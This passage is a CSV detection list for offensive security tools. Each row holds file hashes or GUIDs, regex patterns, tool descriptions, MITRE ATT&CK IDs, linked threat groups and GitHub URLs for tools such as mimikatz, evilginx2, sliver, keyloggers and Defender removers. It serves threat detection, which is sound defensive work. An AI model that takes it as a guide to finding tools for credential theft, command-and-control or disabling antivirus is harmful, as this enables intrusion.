"*91da2d7160926f0af9a398e5ec09328edf59386e14553a052d26f6b44eec642d*",".{0,1000}91da2d7160926f0af9a398e5ec09328edf59386e14553a052d26f6b44eec642d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy
server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31144" "*91dc86c0d4f008fc33306dd379f8db8062364478e08efcb807025303c85b6a59*",".{0,1000}91dc86c0d4f008fc33306dd379f8db8062364478e08efcb807025303c85b6a59.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31145" "*91df836629d68a22c10f485918c2c0406b6e5d12a21f3e8ae3c7baaa0301ee46*",".{0,1000}91df836629d68a22c10f485918c2c0406b6e5d12a21f3e8ae3c7baaa0301ee46.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31146" "*91EA50CD-E8DF-4EDF-A765-75354643BD0D*",".{0,1000}91EA50CD\-E8DF\-4EDF\-A765\-75354643BD0D.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","#GUIDproject","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","31149" "*91ec53f564ad02117b9d7e868c449265e99b4b7443d3a83ffe55b3b49d5be279*",".{0,1000}91ec53f564ad02117b9d7e868c449265e99b4b7443d3a83ffe55b3b49d5be279.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31150" "*91ee16300f9af0ed8c9de365bcb3eeb8e1cf0d7b8b75ce8866ccaf8433fef75a*",".{0,1000}91ee16300f9af0ed8c9de365bcb3eeb8e1cf0d7b8b75ce8866ccaf8433fef75a.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","#filehash","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","31151" "*91f2f27015c46a8de16a364b3c2455dc2cbf43a7b678141d907660f26c3d3f69*",".{0,1000}91f2f27015c46a8de16a364b3c2455dc2cbf43a7b678141d907660f26c3d3f69.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","31152" "*920021c608185f95a4100ebec9e7c0fb4c67c1d192257ba9ac3430b2939762a3*",".{0,1000}920021c608185f95a4100ebec9e7c0fb4c67c1d192257ba9ac3430b2939762a3.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - 
TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","#filehash","N/A","9","3","273","40","2024-06-16T19:47:36Z","2024-01-10T17:25:58Z","31154" "*920B8C5B-0DC5-4BD7-B6BB-D14B39BFC9FE*",".{0,1000}920B8C5B\-0DC5\-4BD7\-B6BB\-D14B39BFC9FE.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","0","#GUIDproject","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","31155" "*920c719a1e1d8509b4f2a46062887ad5d09cc53ef907cb3c58140a9eefe6522d*",".{0,1000}920c719a1e1d8509b4f2a46062887ad5d09cc53ef907cb3c58140a9eefe6522d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31156" "*920D97B7-8091-4224-8CF7-D9D72A64A7FE*",".{0,1000}920D97B7\-8091\-4224\-8CF7\-D9D72A64A7FE.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","#GUIDproject","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","31157" "*920e37529214d87fb835861d8c539e5c70d9d98fb0f48ad097760f298aee30d3*",".{0,1000}920e37529214d87fb835861d8c539e5c70d9d98fb0f48ad097760f298aee30d3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","31158" "*92105bc571692ebbab9f00a66c370901439375f98cfca4986f576d9c808dff38*",".{0,1000}92105bc571692ebbab9f00a66c370901439375f98cfca4986f576d9c808dff38.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","31159" "*92105bc571692ebbab9f00a66c370901439375f98cfca4986f576d9c808dff38*",".{0,1000}92105bc571692ebbab9f00a66c370901439375f98cfca4986f576d9c808dff38.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","31160" "*921157808497e5fe57f27fdb490be391f0f28bacffdb8cb9ed233bc3929b85a3*",".{0,1000}921157808497e5fe57f27fdb490be391f0f28bacffdb8cb9ed233bc3929b85a3.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa.
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","31161" "*921BB3E1-15EE-4bbe-83D4-C4CE176A481B*",".{0,1000}921BB3E1\-15EE\-4bbe\-83D4\-C4CE176A481B.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz UUID","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#GUIDproject","uuid","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31162" "*9220fead7ddb2863404b1fa59bf2ece1de125be39db2661378a8ffd47057b85e*",".{0,1000}9220fead7ddb2863404b1fa59bf2ece1de125be39db2661378a8ffd47057b85e.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","31165" 
"*9227a1bc1584c36ff815fdc09dbec1c23aa11f6adc5b009c305dbb941f9f339a*",".{0,1000}9227a1bc1584c36ff815fdc09dbec1c23aa11f6adc5b009c305dbb941f9f339a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","31166" "*92299f5910a7992534ab33830d9706f4d03798418d5531563a86ee5f4185d553*",".{0,1000}92299f5910a7992534ab33830d9706f4d03798418d5531563a86ee5f4185d553.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","31167" "*922b54e9d685b1bdd4d04f7b34c9f42b5f99745325a65f3147c719108d7e01c5*",".{0,1000}922b54e9d685b1bdd4d04f7b34c9f42b5f99745325a65f3147c719108d7e01c5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31168" "*922d41ca55d3fa150f1c8fdc1f030e2acf6c24fcbd0ce1cd1021aeffe29bf24c*",".{0,1000}922d41ca55d3fa150f1c8fdc1f030e2acf6c24fcbd0ce1cd1021aeffe29bf24c.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","#filehash","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","31169" "*922eba3a1f3bf78db513cac0ab1d959ec27bc1879794b8eead2fe6e346be060f*",".{0,1000}922eba3a1f3bf78db513cac0ab1d959ec27bc1879794b8eead2fe6e346be060f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31170" "*923195967668d70c92c62877cb79a93afecc4eb5144ce6609503123617d55bf3*",".{0,1000}923195967668d70c92c62877cb79a93afecc4eb5144ce6609503123617d55bf3.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 
- T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","31171" "*923ccf5c01669104ef312be3e2cf03ebe3df240a45157ad77d23ecbfa6bc0ceb*",".{0,1000}923ccf5c01669104ef312be3e2cf03ebe3df240a45157ad77d23ecbfa6bc0ceb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31172" "*924b6dd931df29e29d17c91a5097a040661e17d6a8b404a1d0ee6ad9b0a97473*",".{0,1000}924b6dd931df29e29d17c91a5097a040661e17d6a8b404a1d0ee6ad9b0a97473.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31175" 
"*924fb2bd1fe001f9eb62509a05546d1aaf97ebbfca73c75eb665a38b34559c4e*",".{0,1000}924fb2bd1fe001f9eb62509a05546d1aaf97ebbfca73c75eb665a38b34559c4e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31176" "*9250bff8ddad6b9cd10ef94589c2fb82e97a12772856e92af4ff26adfbc3021c*",".{0,1000}9250bff8ddad6b9cd10ef94589c2fb82e97a12772856e92af4ff26adfbc3021c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31177" "*925365b64eb63bafba4fb5c44494428026d98c1a71fc4b54d638c4c22c6e26a7*",".{0,1000}925365b64eb63bafba4fb5c44494428026d98c1a71fc4b54d638c4c22c6e26a7.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","31178" "*92576b05b8f8f5ed4571e1e165fff1ea271b626cad0f6f71e995d24a1fa427b5*",".{0,1000}92576b05b8f8f5ed4571e1e165fff1ea271b626cad0f6f71e995d24a1fa427b5.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate 
accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","31179" "*925c2a5e0070046e8fa0152782f4fa43f042f4364597239c414490a4b25f3811*",".{0,1000}925c2a5e0070046e8fa0152782f4fa43f042f4364597239c414490a4b25f3811.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31180" "*925fe97c66e61207fec6e73bf01385139ccf6a482c234cb63f1bfafa6b260cb7*",".{0,1000}925fe97c66e61207fec6e73bf01385139ccf6a482c234cb63f1bfafa6b260cb7.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","#filehash","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","31181" "*926f9e1e0aacf754734b62556cc9a94961a0f90710b7ebb0b80d71484292d928*",".{0,1000}926f9e1e0aacf754734b62556cc9a94961a0f90710b7ebb0b80d71484292d928.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31184" "*9275c94ba6160e9de488089ba5e4df9f831aaa8a9e2dbe04d0c7ca7feb3a4cb8*",".{0,1000}9275c94ba6160e9de488089ba5e4df9f831aaa8a9e2dbe04d0c7ca7feb3a4cb8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced 
container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","31186" "*927c3728901bdfa38cd1ec9e7ca972923b1cc51d7159e0d25e2c063e6d2a2f60*",".{0,1000}927c3728901bdfa38cd1ec9e7ca972923b1cc51d7159e0d25e2c063e6d2a2f60.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","31187" "*92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50*",".{0,1000}92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","#filehash","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","31188" "*92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50*",".{0,1000}92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","#filehash","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","31189" 
"*92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50*",".{0,1000}92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","31190" "*928097a924168caad66fead2633e4d44e4f585e0d33d05deb50b9c2d34cda246*",".{0,1000}928097a924168caad66fead2633e4d44e4f585e0d33d05deb50b9c2d34cda246.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","31191" "*9280bca757757d39ae4f71993d27f64952fc1a5dcf73c542cb9d1350b8f22049*",".{0,1000}9280bca757757d39ae4f71993d27f64952fc1a5dcf73c542cb9d1350b8f22049.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31192" "*928120DC-5275-4806-B99B-12D67B710DC0*",".{0,1000}928120DC\-5275\-4806\-B99B\-12D67B710DC0.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral 
Movement","https://github.com/pwn1sher/WMEye","1","0","#GUIDproject","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","31193" "*9283d98179addb3f66170f7ac17111f1c91015b421f3e42416cd3b94894ca6ca*",".{0,1000}9283d98179addb3f66170f7ac17111f1c91015b421f3e42416cd3b94894ca6ca.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31194" "*928ce67c10ca27f4e598a79b6c4af224a8505e41d9d391f0a0850f715b02b6cb*",".{0,1000}928ce67c10ca27f4e598a79b6c4af224a8505e41d9d391f0a0850f715b02b6cb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31195" "*928ce67c10ca27f4e598a79b6c4af224a8505e41d9d391f0a0850f715b02b6cb*",".{0,1000}928ce67c10ca27f4e598a79b6c4af224a8505e41d9d391f0a0850f715b02b6cb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31196" "*928ce67c10ca27f4e598a79b6c4af224a8505e41d9d391f0a0850f715b02b6cb*",".{0,1000}928ce67c10ca27f4e598a79b6c4af224a8505e41d9d391f0a0850f715b02b6cb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","31197" "*92957b4a275c9aeb0579dbd5ce0fa2997de8cf1a3952b540089ef3b1c0729aaf*",".{0,1000}92957b4a275c9aeb0579dbd5ce0fa2997de8cf1a3952b540089ef3b1c0729aaf.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","31200" "*9295fa0ab820c08fcab5107558f6d7ad390ec6b4a8112d82e11a51dea28c1862*",".{0,1000}9295fa0ab820c08fcab5107558f6d7ad390ec6b4a8112d82e11a51dea28c1862.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater 